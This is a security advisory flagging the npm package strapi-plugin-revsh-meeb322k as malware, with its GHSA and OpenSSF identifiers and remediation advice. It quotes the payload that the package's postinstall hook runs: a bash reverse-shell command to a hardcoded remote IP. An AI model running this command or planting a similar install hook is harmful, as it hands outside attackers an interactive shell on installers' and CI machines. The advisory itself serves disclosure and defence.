VYPR

npm · Malicious package advisory

Malware

strapi-plugin-revsh-meeb322k

GHSA-8ccq-6g42-37vx

Malicious code in strapi-plugin-revsh-meeb322k (npm)

Details

**Severity:** Critical

**Affected versions:** `= 3.6.8`

## Source: amazon-inspector (d6d4e28da86ccc1cb11bae22a247171657c958b6bf24b8bf4541bb08970c969b)
package.json declares scripts.postinstall = "node postinstall.js", causing postinstall.js to run automatically on npm install. That file executes `bash -c 'bash -i > /dev/tcp/14.225.210.85/443 0>&1'`, opening an interactive bash session from the installer's machine to the hardcoded remote host 14.225.210.85 on TCP/443. There is no authentication, consent prompt, or documented disclosure of this behavior; the payload runs on every install, including CI systems.

---

Credit: [OpenSSF](https://github.com/ossf/malicious-packages) ([source](https://github.com/ossf/malicious-packages/blob/9947fca3b118619628d7c35349b0b5d2b1852e1c/osv/malicious/npm/strapi-plugin-revsh-meeb322k/MAL-2026-16187.json))

**References:**
- https://github.com/ossf/malicious-packages/blob/9947fca3b118619628d7c35349b0b5d2b1852e1c/osv/malicious/npm/strapi-plugin-revsh-meeb322k/MAL-2026-16187.json
- https://www.npmjs.com/package/strapi-plugin-revsh-meeb322k/v/3.6.8
- https://github.com/advisories/GHSA-8ccq-6g42-37vx

Compromised versions (1)

  • = 3.6.8

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.